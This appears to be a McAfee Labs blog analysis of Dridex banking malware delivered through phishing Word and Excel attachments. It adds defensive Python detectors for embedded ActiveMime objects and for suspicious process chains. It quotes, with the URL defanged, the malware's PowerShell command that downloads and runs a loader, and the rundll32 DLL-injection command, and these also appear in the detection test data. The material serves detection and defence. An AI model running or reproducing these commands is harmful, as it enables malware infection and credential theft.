‘Banking’ Malware Dridex Arrives via Phishing Email


Microsoft Office scripting malware has become more and more common and aggressive lately as malware authors constantly develop new techniques to evade detection and deceive users.

This kind of malware, as mentioned in previous posts, usually arrives as an attached document within a phishing email. After the “document” is opened, it downloads the second-stage payload, which downloads and executes the final payload that infects the host machine.

In a recent case involving the Dridex malware, McAfee Labs found the distribution method to be typical: The malware arrives via a phishing email:

[Image: Office PowerShell - e-mail]

We have discovered that the attached document can arrive in one of two variants:

  • The first variant comes as an XML document (.XML or .DOC) containing an embedded Office object encoded in base64. The object is decoded and executed when the XML file is opened.
    [Image: Office PowerShell - XML]

    The embedded ActiveMime object contains an encrypted OLE document that is decrypted and executed as soon as the XML file opens the Office object.
    [Image: Office PowerShell - ActiveMime]
    The OLE file then executes a malicious embedded macro containing code similar to what we see in the following image. This code launches PowerShell and downloads the Dridex loader.
    [Image: Office PowerShell - Macro]
  • The second variant comes as a Word or Excel file (.DOC or .XLS) that contains an Office Active Object that executes the malicious code in the OLE file as native OLE code.
    [Image: Office PowerShell - OLE Native]
    Thus, even if the user has not enabled the execution of macros, the malware can execute by running the malicious code directly from the OLE file. To deceive the user, the malware presents a document file with an Active Object embedded. As shown in the following image, the user is warned about opening malicious Active Objects, similar to the warning displayed whenever a user tries to open a document containing an embedded macro:
    [Image: Office PowerShell - Opening Attachment]
    [Image: Office PowerShell - Excel downloader]
    An incautious user might open the embedded Active Object by ignoring the warning and double-clicking the object. In this case, the downloader code runs by executing a PowerShell instance, as in the first variant.
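The first variant relies on a Word 2003 XML document carrying a base64-encoded ActiveMime (.mso) object in a w:binData element. The following Python is an added triage example, not code from the original post or from McAfee: it walks the w:binData elements of a WordML document, decodes each payload and reports whether the decoded bytes begin with the ASCII "ActiveMime" signature. The two sample documents, their payloads and the element name "editdata.mso" are constructed for this example; the only real-world constants are the WordML namespace and the ActiveMime signature.

```python
import base64
import binascii
import xml.etree.ElementTree as ET

# Namespace of Word 2003 XML ("WordML") documents; embedded objects sit in w:binData.
WORDML_NS = "http://schemas.microsoft.com/office/word/2003/wordml"
# A decoded ActiveMime (.mso) container starts with this ASCII signature.
ACTIVEMIME_MAGIC = b"ActiveMime"


def inspect_bindata(xml_text: str) -> list:
    """Return one record per w:binData element: element name, decoded size,
    whether the payload carries the ActiveMime signature, and decode status."""
    root = ET.fromstring(xml_text)
    records = []
    for elem in root.iter("{%s}binData" % WORDML_NS):
        name = elem.get("{%s}name" % WORDML_NS, "")
        # Real documents wrap the base64 over many lines; drop all whitespace first.
        encoded = "".join("".join(elem.itertext()).split())
        try:
            blob = base64.b64decode(encoded)
        except (binascii.Error, ValueError):
            records.append({"name": name, "size": 0, "activemime": False, "decode_error": True})
            continue
        records.append({
            "name": name,
            "size": len(blob),
            "activemime": blob.startswith(ACTIVEMIME_MAGIC),
            "decode_error": False,
        })
    return records


def has_embedded_activemime(xml_text: str) -> bool:
    """True if any w:binData payload decodes to an ActiveMime container."""
    return any(r["activemime"] for r in inspect_bindata(xml_text))


def _build_doc(bindata_name: str, payload: bytes) -> str:
    """Constructed minimal WordML document with a single w:binData element (test data only)."""
    return (
        f'<w:wordDocument xmlns:w="{WORDML_NS}">'
        f'<w:docOleData><w:binData w:name="{bindata_name}">'
        f'{base64.b64encode(payload).decode()}'
        '</w:binData></w:docOleData>'
        '<w:body><w:p><w:r><w:t>Invoice attached</w:t></w:r></w:p></w:body>'
        '</w:wordDocument>'
    )


# Constructed payloads: a fake ActiveMime header (no real OLE content) and a PNG header.
SUSPICIOUS_PAYLOAD = ACTIVEMIME_MAGIC + b"\x00\x00\x01\xf0" + b"<placeholder, not a real MSO body>"
BENIGN_PAYLOAD = b"\x89PNG\r\n\x1a\n" + b"\x00" * 32

SUSPICIOUS_DOC = _build_doc("editdata.mso", SUSPICIOUS_PAYLOAD)
BENIGN_DOC = _build_doc("wordml://02000001.png", BENIGN_PAYLOAD)


if __name__ == "__main__":
    for label, doc in (("suspicious", SUSPICIOUS_DOC), ("benign", BENIGN_DOC)):
        print(label, has_embedded_activemime(doc), inspect_bindata(doc))
```

Because base64 preserves alignment, the signature can also be spotted without decoding: "ActiveMime" encodes to a string beginning with "QWN0aXZlTWltZQ", which is a cheap string match for mail gateways that cannot afford to parse every attachment. Decoding, as above, is the more reliable check because it tolerates line wrapping and lets the same pass record payload sizes for later extraction.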

In either case, the embedded malicious code will execute a command-line instruction that runs powershell.exe with the following parameters:

[Image: Office PowerShell - PowerShell]

  • cmd /K powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient).DownloadFile('hxxp:// /asalt/assa.exe','%TEMP%\JIOiodfhioIH.cab'); expand %TEMP%\JIOiodfhioIH.cab %TEMP%\JIOiodfhioIH.exe; start %TEMP%\JIOiodfhioIH.exe;

The preceding code will run only if powershell.exe is installed on the system. (The malicious URL has been edited for safety.)

After executing this code, the malware downloads and executes the Dridex loader, which downloads and installs the Dridex DLL on the system.

[Image: Office PowerShell - PowerShell downloader traffic]

[Image: Office PowerShell - Dridex running]

This DLL is injected into explorer.exe by running the following command:

  • rundll32.exe "C:\XX.tmp" NotifierInit

After executing this command, Dridex installs itself on the system, rundll32.exe is terminated, and the host is infected. The malware then contacts its control server(s) to report the infection.
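The two command lines above (the PowerShell download cradle spawned from an Office process, and rundll32.exe loading a .tmp file by export name) are the parts of this chain that endpoint telemetry sees most clearly. The following Python is an added example, not code from the original post or from McAfee: it runs three simple rules over constructed process-creation events in a Sysmon-like shape. The PIDs, paths and the parent/child layout are made up; the command-line fragments and the file names JIOiodfhioIH.cab/.exe and XX.tmp are taken from the post, with the download host replaced by the placeholder REDACTED.

```python
import re

OFFICE_APPS = {"winword.exe", "excel.exe", "powerpnt.exe"}
SCRIPT_HOSTS = {"cmd.exe", "powershell.exe"}

# Rule patterns for the command lines described in the post.
DOWNLOAD_CRADLE = re.compile(r"-executionpolicy\s+bypass.*downloadfile\s*\(", re.I | re.S)
RUNDLL_TMP_EXPORT = re.compile(r'rundll32(?:\.exe)?\s+"?([^"\s]+\.tmp)"?\s+(\w+)', re.I)


def basename(path: str) -> str:
    """Lower-cased file name of a Windows path."""
    return path.replace("/", "\\").rsplit("\\", 1)[-1].lower()


def triage(events: list) -> list:
    """Return (pid, rule_name) pairs for events matching the delivery chain.

    Rules:
      office_spawned_script_host   Office application directly spawns cmd.exe/powershell.exe
      powershell_download_cradle   -ExecutionPolicy bypass together with DownloadFile(
      rundll32_tmp_dll_export      rundll32.exe invoking an export from a .tmp file
    """
    by_pid = {e["pid"]: e for e in events}
    alerts = []
    for e in events:
        image = basename(e["image"])
        parent = by_pid.get(e["ppid"])
        parent_image = basename(parent["image"]) if parent else ""
        cmdline = e["cmdline"]
        if parent_image in OFFICE_APPS and image in SCRIPT_HOSTS:
            alerts.append((e["pid"], "office_spawned_script_host"))
        if DOWNLOAD_CRADLE.search(cmdline):
            alerts.append((e["pid"], "powershell_download_cradle"))
        m = RUNDLL_TMP_EXPORT.search(cmdline)
        if image == "rundll32.exe" and m:
            alerts.append((e["pid"], "rundll32_tmp_dll_export:" + m.group(2)))
    return alerts


# Constructed process-creation events (not real telemetry); parent links follow the post.
EVENTS = [
    {"pid": 3900, "ppid": 1200, "image": r"C:\Windows\explorer.exe", "cmdline": "explorer.exe"},
    {"pid": 4101, "ppid": 3900, "image": r"C:\Program Files\Microsoft Office\Office15\WINWORD.EXE",
     "cmdline": r'"WINWORD.EXE" /n "C:\Users\user\Downloads\invoice.doc"'},
    {"pid": 4120, "ppid": 4101, "image": r"C:\Windows\System32\cmd.exe",
     "cmdline": "cmd /K powershell.exe -ExecutionPolicy bypass -noprofile "
                "(New-Object System.Net.WebClient).DownloadFile('hxxp://REDACTED/asalt/assa.exe',"
                "'%TEMP%\\JIOiodfhioIH.cab'); expand %TEMP%\\JIOiodfhioIH.cab %TEMP%\\JIOiodfhioIH.exe; "
                "start %TEMP%\\JIOiodfhioIH.exe;"},
    {"pid": 4133, "ppid": 4120, "image": r"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe",
     "cmdline": "powershell.exe -ExecutionPolicy bypass -noprofile (New-Object System.Net.WebClient)"
                ".DownloadFile('hxxp://REDACTED/asalt/assa.exe',"
                "'C:\\Users\\user\\AppData\\Local\\Temp\\JIOiodfhioIH.cab')"},
    {"pid": 4160, "ppid": 4120, "image": r"C:\Users\user\AppData\Local\Temp\JIOiodfhioIH.exe",
     "cmdline": r"C:\Users\user\AppData\Local\Temp\JIOiodfhioIH.exe"},
    {"pid": 4170, "ppid": 4160, "image": r"C:\Windows\System32\rundll32.exe",
     "cmdline": r'rundll32.exe "C:\XX.tmp" NotifierInit'},
    # Benign control: an editor started from the shell, no script host, no cradle.
    {"pid": 4200, "ppid": 3900, "image": r"C:\Windows\System32\notepad.exe",
     "cmdline": "notepad.exe notes.txt"},
]


if __name__ == "__main__":
    for pid, rule in triage(EVENTS):
        print(pid, rule)
```

The parent-process rule is the most robust of the three because it does not depend on the exact switches the macro uses; the other two are cheap string matches that an attacker can reorder or obfuscate, so they work best as corroboration when the first rule fires.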

Dridex is “banker” malware that can steal user credentials for online accounts; it is derived from Cridex. Both are part of the GameOver Zeus malware family.

The following control servers were contacted by the malware during our research. We recommend blocking the following IPs:


McAfee products detect this malware and its payload with the following detection names:

  • W97M downloaders: W97M/Downloader.aen, W97M/Downloader.aev, W97M/Downloader.afc, X97M/Downloader
  • Dridex downloader (loader): Downloader-FAQM, Downloader-FAQZ
  • Dridex 32/64-bit: PWS-Dridex
